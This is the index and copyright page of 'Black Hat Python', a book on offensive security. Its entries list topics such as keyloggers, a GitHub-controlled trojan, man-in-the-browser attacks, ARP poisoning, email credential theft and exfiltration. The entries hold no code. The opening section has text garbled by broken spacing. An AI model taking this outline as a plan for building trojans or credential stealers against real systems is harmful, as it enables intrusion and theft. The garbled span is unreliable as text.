Jy th o n s ta nd alo ne J A R f ile ,
Exte nd in g B urp P ro xy
,
Burp F uzzin g
K
Kali L in ux,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
,
In sta llin g K ali L in ux
defa ult u se rn am e a nd p assw ord ,
In sta llin g K ali L in ux
desk to p e nv ir o nm ent,
In sta llin g K ali L in ux
dete rm in in g v ers io n,
In sta llin g K ali L in ux
dow nlo ad in g i m age,
In sta llin g K ali L in ux
genera l d is c ussio n,
In sta llin g K ali L in ux
in sta llin g p ackages,
In sta llin g K ali L in ux
KeyD ow n e v ent,
Keylo ggin g f o r F un a nd K eystr o kes
keylo ggin g,
Keylo ggin g f o r F un a nd K eystr o kes
KeyS tr o ke f u ncti o n,
Keylo ggin g f o r F un a nd K eystr o kes
Khra is , H ussa m ,
SSH w ith P ara m ik o
Kuczm ars k i, K aro l,
Hackin g P yth o n’s i m port F uncti o nality
L
LA ST IN PU TIN FO s tr u ctu re ,
Sand box D ete cti o n
lo ad _m odule f u ncti o n,
Hackin g P yth o n’s i m port F uncti o nality
lo gin _ fo rm _in d ex f u ncti o n,
Man-in -th e-B ro w se r ( K in d O f)

lo gin _ to _tu m blr f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
lo go ut_ fo rm f u ncti o n,
Man-in -th e-B ro w se r ( K in d O f)
lo go ut_ url f u ncti o n,
Man-in -th e-B ro w se r ( K in d O f)
M
man-in -th e-b ro w se r ( M itB ) a tta cks,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Man-in -th e-B ro w se r ( K in d O f)
,
Cre ati n g th e S erv er
cre ati n g H TTP s e rv er,
Man-in -th e-B ro w se r ( K in d O f)
defin ed ,
Man-in -th e-B ro w se r ( K in d O f)
main l o op,
Man-in -th e-B ro w se r ( K in d O f)
su p port s tr u ctu re f o r,
Man-in -th e-B ro w se r ( K in d O f)
te sti n g,
Cre ati n g th e S erv er
waiti n g f o r b ro w se r f u ncti o nality ,
Man-in -th e-B ro w se r ( K in d O f)
man-in -th e-m id dle ( M IT M ) a tta cks,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith
Scap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g
with S cap y
ad din g s u p porti n g f u ncti o ns,
ARP C ache P ois o nin g w ith S cap y
co din g p ois o nin g s c rip t,
ARP C ache P ois o nin g w ith S cap y
in sp ecti n g c ache,
ARP C ache P ois o nin g w ith S cap y
te sti n g,
ARP C ache P ois o nin g w ith S cap y
mangle f u ncti o n,
Turn in g W eb site C onte nt i n to P assw ord G old
Meta sp lo it,
Pyth o nic S hellc o de E xecuti o n
Mic ro so ft,
Kic kin g th e T ir e s
( s e e B in g s e arc h e ngin e; I n te rn et E xp lo re r C O M a uto m ati o n)
MitB a tta cks,
Man-in -th e-B ro w se r ( K in d O f)
( s e e m an-in -th e-b ro w se r a tta cks)
MIT M a tta cks,
ARP C ache P ois o nin g w ith S cap y
( s e e m an-in -th e-m id dle a tta cks)
module s d ir e cto ry ,
Gith ub C om mand a nd C ontr o l
module _ ru nner f u ncti o n,
Hackin g P yth o n’s i m port F uncti o nality
muta te _ paylo ad f u ncti o n,
Burp F uzzin g
N
Nathoo, Karim, Man-in-the-Browser (Kind Of)
netaddr module, Decoding ICMP, Kicking the Tires
netcat-like functionality, TCP Server, Replacing Netcat
  adding client code, Replacing Netcat
  calling functions, Replacing Netcat
  command execution functionality, Replacing Netcat
  command shell, Replacing Netcat
  creating main function, Replacing Netcat
  creating primary server loop, Replacing Netcat
  creating stub function, Replacing Netcat
  file upload functionality, Replacing Netcat
  importing libraries, TCP Server
  setting global variables, TCP Server
  testing, Replacing Netcat
network basics, The Network: Basics, TCP Client, TCP Server, Kicking the Tires, Building a TCP Proxy, SSH with Paramiko, SSH Tunneling
  creating TCP clients, The Network: Basics
  creating TCP proxies, Kicking the Tires, Building a TCP Proxy
    hex dumping function, Building a TCP Proxy
    proxy_handler function, Building a TCP Proxy
    reasons for, Kicking the Tires
    testing, Building a TCP Proxy
  creating TCP servers, TCP Server
  creating UDP clients, TCP Client
  netcat-like functionality, TCP Server (see netcat-like functionality)
  SSH tunneling, Kicking the Tires, SSH Tunneling
    forward, Kicking the Tires
    reverse, Kicking the Tires, SSH Tunneling
    testing, SSH Tunneling
  SSH with Paramiko, SSH with Paramiko
    creating SSH server, SSH with Paramiko
    installing Paramiko, SSH with Paramiko
    key authentication, SSH with Paramiko
    running commands on Windows client over SSH, SSH with Paramiko
    testing, SSH with Paramiko
network sniffers, The Network: Raw Sockets and Sniffing, Packet Sniffing on Windows and Linux, Decoding the IP Layer, Kicking the Tires, Decoding ICMP
  discovering active hosts on network segments, The Network: Raw Sockets and Sniffing
  ICMP message decoding routine, Kicking the Tires, Decoding ICMP
    Destination Unreachable message, Kicking the Tires, Decoding ICMP
    length calculation, Decoding ICMP
    message elements, Kicking the Tires
    sending UDP datagrams and interpreting results, Decoding ICMP
    testing, Decoding ICMP
  IP header decoding routine, Packet Sniffing on Windows and Linux, Decoding the IP Layer
    avoiding bit manipulation, Decoding the IP Layer
    human-readable protocol, Decoding the IP Layer
    testing, Decoding the IP Layer
    typical IPv4 header structure, Decoding the IP Layer
  promiscuous mode, Packet Sniffing on Windows and Linux
  setting up raw socket sniffer, Packet Sniffing on Windows and Linux
  Windows versus Linux, The Network: Raw Sockets and Sniffing
__new__ method, Decoding the IP Layer
O
offensive forensics automation, Automating Offensive Forensics, Grabbing Password Hashes, Direct Code Injection
  direct code injection, Direct Code Injection
  installing Volatility, Automating Offensive Forensics
  profiles, Automating Offensive Forensics
  recovering password hashes, Grabbing Password Hashes
online resources, Setting Up Your Python Environment, Installing Kali Linux, WingIDE, The Network: Basics, SSH with Paramiko, The Network: Raw Sockets and Sniffing, Packet Sniffing on Windows and Linux, Kicking the Tires, Owning the Network with Scapy, PCAP Processing, Brute-Forcing HTML Form Authentication, Extending Burp Proxy, Bing for Burp, Github Command and Control, Building a Github-Aware Trojan, Hacking Python's import Functionality, Keylogging for Fun and Keystrokes, Taking Screenshots, Pythonic Shellcode Execution, Creating the Server, Windows Privilege Escalation, Creating a Process Monitor, Process Monitoring with WMI, Automating Offensive Forensics, Direct Code Injection
  Bing API keys, Bing for Burp
  Burp, Extending Burp Proxy
  Cain and Abel, Kicking the Tires
  Carlos Perez, Kicking the Tires
  creating basic structure for repo, Github Command and Control
  DirBuster project, Kicking the Tires
  El Jefe project, Creating a Process Monitor
  facial detection code, PCAP Processing
  generating Metasploit payloads, Pythonic Shellcode Execution
  hacking Python import functionality, Hacking Python's import Functionality
  Hussam Khrais, SSH with Paramiko
  Immunity Debugger, Direct Code Injection
  input/output control (IOCTL), Packet Sniffing on Windows and Linux
  Joomla administrator login form, Brute-Forcing HTML Form Authentication
  Jython, Extending Burp Proxy
  Kali Linux, Installing Kali Linux
  MessageBox shellcode, Direct Code Injection
  netaddr module, Kicking the Tires
  OpenCV, PCAP Processing
  Paramiko, SSH with Paramiko
  PortSwigger Web Security, Extending Burp Proxy
  privilege escalation example service, Windows Privilege Escalation
  py2exe, Building a Github-Aware Trojan
  PyCrypto package, Creating the Server
  PyHook library, Keylogging for Fun and Keystrokes
  Python GitHub API library, Github Command and Control
  Python WMI page, Creating a Process Monitor
  PyWin32 installer, Windows Privilege Escalation
  Scapy, Owning the Network with Scapy
  socket module, The Network: Basics
  SVNDigger, Kicking the Tires
  VMWare Player, Setting Up Your Python Environment
  Volatility framework, Automating Offensive Forensics
  Win32_Process class documentation, Process Monitoring with WMI
  Windows GDI, Taking Screenshots
  WingIDE, WingIDE
  Wireshark, The Network: Raw Sockets and Sniffing
OpenCV, PCAP Processing
os.walk function, Mapping Open Source Web App Installations
owned flag, Man-in-the-Browser (Kind Of)
P
packet capture file processing, Kicking the Tires (see PCAP processing)
packet.show() function, Stealing Email Credentials
Paramiko, SSH with Paramiko
  creating SSH server, SSH with Paramiko
  installing, SSH with Paramiko
  running commands on Windows client over SSH, SSH with Paramiko
  SSH key authentication, SSH with Paramiko
  testing, SSH with Paramiko
password-guessing wordlist, Turning Website Content into Password Gold
  converting selected HTTP traffic into wordlist, Turning Website Content into Password Gold
  functionality to display wordlist, Turning Website Content into Password Gold
  testing, Turning Website Content into Password Gold
Payloads tab, Burp, Kicking the Tires
PCAP (packet capture file) processing, ARP Cache Poisoning with Scapy, Kicking the Tires, PCAP Processing
  adding facial detection code, PCAP Processing
  adding supporting functions, PCAP Processing
  ARP cache poisoning results, ARP Cache Poisoning with Scapy
  coding processing script, PCAP Processing
  image carving script, Kicking the Tires
  testing, PCAP Processing
Perez, Carlos, Kicking the Tires
pip package manager, Installing Kali Linux
POP3 credentials, stealing, Owning the Network with Scapy, Stealing Email Credentials
populate_offsets function, Grabbing Password Hashes
Port Unreachable error, Kicking the Tires
PortSwigger Web Security, Extending Burp Proxy
Positions tab, Burp, Kicking the Tires
post_to_tumblr function, IE COM Automation for Exfiltration
privilege escalation, Windows Privilege Escalation, Creating a Process Monitor, Process Monitoring with WMI, Windows Token Privileges, Winning the Race, Kicking the Tires
  code injection, Kicking the Tires
  installing example service, Windows Privilege Escalation
  installing libraries, Windows Privilege Escalation
  process monitoring, Creating a Process Monitor, Process Monitoring with WMI
    testing, Process Monitoring with WMI
    with WMI, Creating a Process Monitor
  token privileges, Process Monitoring with WMI, Windows Token Privileges
    automatically retrieving enabled privileges, Windows Token Privileges
    outputting and logging, Windows Token Privileges
  winning race against code execution, Winning the Race
    creating file monitor, Winning the Race
    testing, Winning the Race
prn parameter, Owning the Network with Scapy
process monitoring, Creating a Process Monitor, Process Monitoring with WMI
  winning race against code execution, Creating a Process Monitor, Process Monitoring with WMI
  testing, Process Monitoring with WMI
  with WMI, Creating a Process Monitor
process_watcher function, Process Monitoring with WMI
--profile flag, Automating Offensive Forensics
Proxy tab, Burp, Kicking the Tires
proxy_handler function, Building a TCP Proxy
PSList class, Direct Code Injection
py2exe, Building a Github-Aware Trojan
PyCrypto package, Creating the Server, IE COM Automation for Exfiltration
PyHook library, Keylogging for Fun and Keystrokes, Sandbox Detection
Python GitHub API library, Github Command and Control
PyWin32 installer, Windows Privilege Escalation
Q
Queue objects, Mapping Open Source Web App Installations, Brute-Forcing Directories and File Locations
R
random_sleep function, IE COM Automation for Exfiltration
ReadDirectoryChangesW function, Winning the Race
receive_from function, Building a TCP Proxy
recvfrom() function, TCP Client
registerIntruderPayloadGeneratorFactory function, Burp Fuzzing
RegistryApi class, Grabbing Password Hashes
Repeater tool, Burp, Burp Fuzzing
Request class, The Socket Library of the Web: urllib2
request_handler function, Building a TCP Proxy
request_port_forward function, SSH Tunneling
reset function, Burp Fuzzing
response_handler function, Building a TCP Proxy
restore_target function, ARP Cache Poisoning with Scapy
reverse SSH tunneling, Kicking the Tires, SSH Tunneling
reverse_forward_tunnel function, SSH Tunneling
run function, Creating Modules
S
sandbox detection, Kicking the Tires
Scapy library, Owning the Network with Scapy, Stealing Email Credentials, ARP Cache Poisoning with Scapy, Kicking the Tires, PCAP Processing
  ARP cache poisoning, ARP Cache Poisoning with Scapy
    adding supporting functions, ARP Cache Poisoning with Scapy
    coding poisoning script, ARP Cache Poisoning with Scapy
    inspecting cache, ARP Cache Poisoning with Scapy
    testing, ARP Cache Poisoning with Scapy
  installing, Owning the Network with Scapy
  PCAP processing, ARP Cache Poisoning with Scapy, Kicking the Tires, PCAP Processing
    adding facial detection code, PCAP Processing
    adding supporting functions, PCAP Processing
    ARP cache poisoning results, ARP Cache Poisoning with Scapy
    coding processing script, PCAP Processing
    image carving script, Kicking the Tires
    testing, PCAP Processing
  stealing email credentials, Owning the Network with Scapy, Stealing Email Credentials
    applying filter for common mail ports, Stealing Email Credentials
    creating simple sniffer, Owning the Network with Scapy
    testing, Stealing Email Credentials
Scope tab, Burp, Kicking the Tires, Turning Website Content into Password Gold
screenshots, Kicking the Tires
SeBackupPrivilege privilege, Windows Token Privileges
Secure Shell, SSH with Paramiko (see SSH)
SeDebugPrivilege privilege, Windows Token Privileges
SelectObject function, Taking Screenshots
SeLoadDriver privilege, Windows Token Privileges
sendto() function, TCP Client
server_loop function, Replacing Netcat
SetWindowsHookEx function, Keylogging for Fun and Keystrokes
shellcode execution, Taking Screenshots
SimpleHTTPServer module, Pythonic Shellcode Execution
Site map tab, Burp, Turning Website Content into Password Gold, Kicking the Tires
SMTP credentials, stealing, Owning the Network with Scapy, Stealing Email Credentials
sniff function, Owning the Network with Scapy
socket module, The Network: Basics, TCP Client, TCP Server, Kicking the Tires
  building TCP proxies, Kicking the Tires
  creating TCP clients, The Network: Basics
  creating TCP servers, TCP Server
  creating UDP clients, TCP Client
  netcat-like functionality, TCP Server
SOCK_DGRAM parameter, TCP Client
SOCK_STREAM parameter, The Network: Basics
SSH (Secure Shell), SSH with Paramiko, Kicking the Tires, SSH Tunneling
  tunneling, Kicking the Tires, SSH Tunneling
    forward, Kicking the Tires
    reverse, Kicking the Tires, SSH Tunneling
    testing, SSH Tunneling
  with Paramiko, SSH with Paramiko
    creating SSH server, SSH with Paramiko
    installing Paramiko, SSH with Paramiko
    key authentication, SSH with Paramiko
    running commands on Windows client over SSH, SSH with Paramiko
    testing, SSH with Paramiko
ssh_command function, SSH with Paramiko
Stack Data tab, WingIDE, WingIDE
start_monitor function, Winning the Race
store parameter, Stealing Email Credentials
store_module_result function, Building a Github-Aware Trojan
strip function, Turning Website Content into Password Gold
subprocess library, Replacing Netcat
SVNDigger, Kicking the Tires
T
TagStripper class, Turning Website Content into Password Gold
tag_results dictionary, Brute-Forcing HTML Form Authentication
Target tab, Burp, Kicking the Tires, Turning Website Content into Password Gold
TCP clients, creating, The Network: Basics
TCP proxies, Kicking the Tires, Building a TCP Proxy
  creating, Kicking the Tires
  hex dumping function, Building a TCP Proxy
  proxy_handler function, Building a TCP Proxy
  reasons for building, Kicking the Tires
  testing, Building a TCP Proxy
TCP servers, creating, TCP Server
TCPServer class, Man-in-the-Browser (Kind Of)
test_remote function, Mapping Open Source Web App Installations
token privileges, Process Monitoring with WMI, Windows Token Privileges
  automatically retrieving enabled privileges, Windows Token Privileges
  outputting and logging, Windows Token Privileges
transport method, SSH Tunneling
trojans, Github Command and Control, Creating Modules, Trojan Configuration, Building a Github-Aware Trojan, Hacking Python's import Functionality, Kicking the Tires, Common Trojaning Tasks on Windows, Keylogging for Fun and Keystrokes, Taking Screenshots
  GitHub-aware, Github Command and Control, Creating Modules, Trojan Configuration, Building a Github-Aware Trojan, Hacking Python's import Functionality, Kicking the Tires
    account setup, Github Command and Control
    building, Building a Github-Aware Trojan
    configuring, Trojan Configuration
    creating modules, Creating Modules
    hacking import functionality, Hacking Python's import Functionality
    improvements and enhancements to, Kicking the Tires
    testing, Hacking Python's import Functionality
  Windows tasks, Common Trojaning Tasks on Windows, Keylogging for Fun and Keystrokes, Kicking the Tires, Taking Screenshots
    keylogging, Keylogging for Fun and Keystrokes
    sandbox detection, Kicking the Tires
    screenshots, Kicking the Tires
    shellcode execution, Taking Screenshots
Tumblr, Creating the Server
U
UDP clients, creating, TCP Client
udp_sender function, Decoding ICMP
urllib2 library, The Socket Library of the Web: urllib2, Taking Screenshots
urlopen function, The Socket Library of the Web: urllib2
V
VMWare Player, Setting Up Your Python Environment
Volatility framework, Automating Offensive Forensics, Grabbing Password Hashes, Direct Code Injection
  direct code injection, Direct Code Injection
  installing, Automating Offensive Forensics
  profiles, Automating Offensive Forensics
  recovering password hashes, Grabbing Password Hashes
W
wait_for_browser function, Man-in-the-Browser (Kind Of)
wb flag, Replacing Netcat
web application attacks, Web Hackery, The Socket Library of the Web: urllib2, Mapping Open Source Web App Installations, Kicking the Tires, Brute-Forcing Directories and File Locations, Brute-Forcing HTML Form Authentication, Burp Fuzzing
  brute-forcing directories and file locations, Kicking the Tires, Brute-Forcing Directories and File Locations
    applying list of extensions to test for, Brute-Forcing Directories and File Locations
    creating list of extensions, Brute-Forcing Directories and File Locations
    creating Queue objects out of wordlist files, Brute-Forcing Directories and File Locations
    setting up wordlist, Brute-Forcing Directories and File Locations
    testing, Brute-Forcing Directories and File Locations
  brute-forcing HTML form authentication, Brute-Forcing HTML Form Authentication, Kicking the Tires
    administrator login form, Brute-Forcing HTML Form Authentication
    general settings, Brute-Forcing HTML Form Authentication
    HTML parsing class, Brute-Forcing HTML Form Authentication
    pasting in wordlist, Brute-Forcing HTML Form Authentication
    primary brute-forcing class, Brute-Forcing HTML Form Authentication
    request flow, Brute-Forcing HTML Form Authentication
    testing, Kicking the Tires
  GET requests, The Socket Library of the Web: urllib2, Mapping Open Source Web App Installations
    mapping open source web app installations, Mapping Open Source Web App Installations
    simple, The Socket Library of the Web: urllib2
    socket library, The Socket Library of the Web: urllib2
    using Request class, The Socket Library of the Web: urllib2
  web application fuzzers, Burp Fuzzing, Kicking the Tires
    accessing Burp documentation, Burp Fuzzing
    implementing code to meet requirements, Burp Fuzzing
    loading extension, Burp Fuzzing, Kicking the Tires
    simple fuzzer, Burp Fuzzing
    using extension in attacks, Kicking the Tires
win32security module, Windows Token Privileges
Win32_Process class, Process Monitoring with WMI
Windows Graphics Device Interface (GDI), Kicking the Tires
Windows privilege escalation, Windows Privilege Escalation, Creating a Process Monitor, Process Monitoring with WMI, Windows Token Privileges, Winning the Race, Kicking the Tires
  code injection, Kicking the Tires
  installing example service, Windows Privilege Escalation
  installing libraries, Windows Privilege Escalation
  process monitoring, Creating a Process Monitor, Process Monitoring with WMI
    testing, Process Monitoring with WMI
    with WMI, Creating a Process Monitor
  token privileges, Process Monitoring with WMI, Windows Token Privileges
    automatically retrieving enabled privileges, Windows Token Privileges
    outputting and logging, Windows Token Privileges
  winning race against code execution, Winning the Race
    creating file monitor, Winning the Race
    testing, Winning the Race
Windows trojan tasks, Common Trojaning Tasks on Windows, Keylogging for Fun and Keystrokes, Kicking the Tires, Taking Screenshots
  keylogging, Keylogging for Fun and Keystrokes
  sandbox detection, Kicking the Tires
  screenshots, Kicking the Tires
  shellcode execution, Taking Screenshots
WingIDE, Installing Kali Linux, WingIDE
  accessing, WingIDE
  fixing missing dependencies, WingIDE
  general discussion, Installing Kali Linux
  inspecting and modifying local variables, WingIDE
  installing, WingIDE
  opening blank Python file, WingIDE
  setting breakpoints, WingIDE
  setting script for debugging, WingIDE
  viewing stack trace, WingIDE
wordlist_menu function, Turning Website Content into Password Gold
Wuergler, Mark, Creating a Process Monitor

Black Hat Python: Python Programming for Hackers and Pentesters
Justin Seitz
Copyright © 2014 BLACK HAT PYTHON. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior written permission of the copyright owner and the publisher.
18 17 16 15 14   1 2 3 4 5 6 7 8 9
ISBN-10: 1-59327-590-0
ISBN-13: 978-1-59327-590-7
Publisher: William Pollock
Production Editor: Serena Yang
Cover Illustration: Garry Booth
Interior Design: Octopod Studios
Developmental Editor: Tyler Ortman
Technical Reviewers: Dan Frisch and Cliff Janzen
Copyeditor: Gillian McGarvey
Compositor: Lynn L'Heureux
Proofreader: James Fraleigh
Indexer: BIM Indexing and Proofreading Services
For information on distribution, translations, or bulk sales, please contact No Starch Press, Inc. directly:
No Starch Press, Inc.
245 8th Street, San Francisco, CA 94103
phone: 415.863.9900; info@nostarch.com
www.nostarch.com
Library of Congress Control Number: 2014953241
No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark.
The information in this book is distributed on an "As Is" basis, without warranty. While every precaution has been taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information contained in it.
No Starch Press
2014-11-26T08:31:28-08:00
